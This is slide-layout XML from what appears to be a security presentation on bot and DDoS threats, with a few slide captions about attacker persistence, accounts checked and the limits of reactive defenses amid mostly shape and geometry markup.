      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721232" y="4353633"/>
            <a:ext cx="1268796" cy="693571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1988915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Attacking IP Persistence: Finance Customer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1285265"/>
            <a:ext cx="8591565" cy="5233746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6801341"/>
            <a:ext cx="10545592" cy="547842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="146304" tIns="73152" rIns="146304" bIns="73152" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>427,444,261 Accounts Checked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Frame 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1005841" y="2886579"/>
            <a:ext cx="8591563" cy="3094330"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd name="adj1" fmla="val 221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46304" tIns="73152" rIns="146304" bIns="73152" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1463040" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2900" b="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9825779" y="3959768"/>
            <a:ext cx="4073102" cy="947952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="146304" tIns="73152" rIns="146304" bIns="73152" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>75% Multi-day Attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146973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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Due to recent attack sizes, infrastructure capacity build out is not economical, and may not work anyway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The burst speed of attacks has become too fast for reactive defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small bot armies can generate large DDOS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huge bot armies have been employed in application-layer attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165611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descr="cloud copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3963017" y="2154747"/>
            <a:ext cx="7399010" cy="4970146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8468653" y="5747163"/>
            <a:ext cx="417970" cy="1271501"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4912"/>
              <a:gd name="connsiteY0" fmla="*/ 8633 h 8633"/>
              <a:gd name="connsiteX1" fmla="*/ 4912 w 4912"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 8633"/>
              <a:gd name="connsiteX0" fmla="*/ 9944 w 19944"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 3580 w 19944"/>
              <a:gd name="connsiteY1" fmla="*/ 3493 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 19944 w 19944"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 98986 w 98986"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 92622 w 98986"/>
              <a:gd name="connsiteY1" fmla="*/ 18026 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 3333 w 98986"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 95653"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 89289 w 95653"/>
              <a:gd name="connsiteY1" fmla="*/ 18026 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 95653"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 10807 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 10807 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 11092 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 102001"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 102001 w 102001"/>
              <a:gd name="connsiteY1" fmla="*/ 11092 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102001"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95653 w 101154"/>
              <a:gd name="connsiteY0" fmla="*/ 24533 h 24533"/>
              <a:gd name="connsiteX1" fmla="*/ 101154 w 101154"/>
              <a:gd name="connsiteY1" fmla="*/ 11472 h 24533"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 101154"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 24533"/>
              <a:gd name="connsiteX0" fmla="*/ 95088 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 23678 h 23678"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 23678"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23678"/>
              <a:gd name="connsiteX0" fmla="*/ 93393 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 22063 h 22063"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 22063"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 22063"/>
              <a:gd name="connsiteX0" fmla="*/ 93675 w 100589"/>
              <a:gd name="connsiteY0" fmla="*/ 21493 h 21493"/>
              <a:gd name="connsiteX1" fmla="*/ 100589 w 100589"/>
              <a:gd name="connsiteY1" fmla="*/ 10617 h 21493"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 21493"/>
              <a:gd name="connsiteX0" fmla="*/ 93675 w 102284"/>
              <a:gd name="connsiteY0" fmla="*/ 21493 h 21493"/>
              <a:gd name="connsiteX1" fmla="*/ 102284 w 102284"/>
              <a:gd name="connsiteY1" fmla="*/ 10047 h 21493"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102284"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 21493"/>
              <a:gd name="connsiteX0" fmla="*/ 93957 w 102566"/>
              <a:gd name="connsiteY0" fmla="*/ 22348 h 22348"/>
              <a:gd name="connsiteX1" fmla="*/ 102566 w 102566"/>
              <a:gd name="connsiteY1" fmla="*/ 10902 h 22348"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102566"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 22348"/>
              <a:gd name="connsiteX0" fmla="*/ 93957 w 102566"/>
              <a:gd name="connsiteY0" fmla="*/ 22348 h 22348"/>
              <a:gd name="connsiteX1" fmla="*/ 96916 w 102566"/>
              <a:gd name="connsiteY1" fmla="*/ 22206 h 22348"/>
              <a:gd name="connsiteX2" fmla="*/ 102566 w 102566"/>
              <a:gd name="connsiteY2" fmla="*/ 10902 h 22348"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 102566"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 22348"/>
              <a:gd name="connsiteX0" fmla="*/ 1 w 8610"/>
              <a:gd name="connsiteY0" fmla="*/ 11446 h 11446"/>
              <a:gd name="connsiteX1" fmla="*/ 2960 w 8610"/>
              <a:gd name="connsiteY1" fmla="*/ 11304 h 11446"/>
              <a:gd name="connsiteX2" fmla="*/ 8610 w 8610"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 11446"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8610" h="11446">
                <a:moveTo>
                  <a:pt x="1" y="11446"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-49" y="11367"/>
                  <a:pt x="3010" y="11383"/>
                  <a:pt x="2960" y="11304"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8610" y="0"/>
                </a:ln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0" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8941859" y="5719763"/>
            <a:ext cx="2153322" cy="1028700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 14539 w 14539"/>
              <a:gd name="connsiteY0" fmla="*/ 12226 h 12226"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 14539"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 12226"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38813"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 38813"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38813"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 38813"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 38813"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38821"/>
              <a:gd name="connsiteX1" fmla="*/ 47753 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 34104 h 38821"/>
              <a:gd name="connsiteX2" fmla="*/ 33499 w 47859"/>
              <a:gd name="connsiteY2" fmla="*/ 20446 h 38821"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 38821"/>
              <a:gd name="connsiteX0" fmla="*/ 47753 w 47753"/>
              <a:gd name="connsiteY0" fmla="*/ 34104 h 34104"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47753"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 34104"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47753"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 34104"/>
              <a:gd name="connsiteX0" fmla="*/ 47753 w 47753"/>
              <a:gd name="connsiteY0" fmla="*/ 34104 h 34104"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47753"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 34104"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47753"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 34104"/>
              <a:gd name="connsiteX0" fmla="*/ 14254 w 14254"/>
              <a:gd name="connsiteY0" fmla="*/ 13658 h 13658"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 14254"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 13658"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14254" h="13658">
                <a:moveTo>
                  <a:pt x="14254" y="13658"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:ln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1" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4905022" y="1950722"/>
            <a:ext cx="1201536" cy="730184"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 16998 w 16998"/>
              <a:gd name="connsiteY0" fmla="*/ 5740 h 5740"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 16998"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5740"/>
              <a:gd name="connsiteX0" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 7886 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 4089 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 17081"/>
              <a:gd name="connsiteY0" fmla="*/ 31836 h 31836"/>
              <a:gd name="connsiteX1" fmla="*/ 16395 w 17081"/>
              <a:gd name="connsiteY1" fmla="*/ 4089 h 31836"/>
              <a:gd name="connsiteX2" fmla="*/ 8509 w 17081"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 31836"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 18986"/>
              <a:gd name="connsiteY0" fmla="*/ 31836 h 31836"/>
              <a:gd name="connsiteX1" fmla="*/ 18300 w 18986"/>
              <a:gd name="connsiteY1" fmla="*/ 10713 h 31836"/>
              <a:gd name="connsiteX2" fmla="*/ 8509 w 18986"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 31836"/>
              <a:gd name="connsiteX0" fmla="*/ 9791 w 9837"/>
              <a:gd name="connsiteY0" fmla="*/ 10713 h 10775"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 9837"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10775"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9837" h="10775">
                <a:moveTo>
                  <a:pt x="9791" y="10713"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10477" y="11573"/>
                  <a:pt x="3333" y="3333"/>
                  <a:pt x="0" y="0"/>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6" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8263736" y="1261983"/>
            <a:ext cx="567302" cy="1153052"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 10000 w 14181"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 12023 w 14181"/>
              <a:gd name="connsiteY1" fmla="*/ 6012 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 14181"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 93452"/>
              <a:gd name="connsiteY0" fmla="*/ 23142 h 23142"/>
              <a:gd name="connsiteX1" fmla="*/ 91294 w 93452"/>
              <a:gd name="connsiteY1" fmla="*/ 6012 h 23142"/>
              <a:gd name="connsiteX2" fmla="*/ 79271 w 93452"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23142"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 91348"/>
              <a:gd name="connsiteY0" fmla="*/ 23142 h 23142"/>
              <a:gd name="connsiteX1" fmla="*/ 89190 w 91348"/>
              <a:gd name="connsiteY1" fmla="*/ 9368 h 23142"/>
              <a:gd name="connsiteX2" fmla="*/ 79271 w 91348"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23142"/>
              <a:gd name="connsiteX0" fmla="*/ 9919 w 10257"/>
              <a:gd name="connsiteY0" fmla="*/ 9368 h 9697"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 10257"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 9697"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10257" h="9697">
                <a:moveTo>
                  <a:pt x="9919" y="9368"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12077" y="11421"/>
                  <a:pt x="3333" y="3333"/>
                  <a:pt x="0" y="0"/>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17" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8837921" y="2131097"/>
            <a:ext cx="1939990" cy="480060"/>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273" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3859980" y="2541736"/>
            <a:ext cx="7040949" cy="1646408"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="770"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2359" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2359" h="770">
                <a:moveTo>
                  <a:pt x="0" y="770"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2359" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="33996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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36220" name="Group 36219"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3289189" y="703069"/>
            <a:ext cx="8435956" cy="6981053"/>
            <a:chOff x="3289189" y="703069"/>
            <a:chExt cx="8435956" cy="6981053"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3289189" y="6544628"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="3" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36345"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46"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347"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5" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36342"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343"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4"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337"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38"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39"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0"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341"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7" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8170492" y="7101192"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="28" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36267"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68"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269"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9" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36264"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265"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6"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259"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0"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1"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2"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263"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6154" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4169976" y="1286301"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36166" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
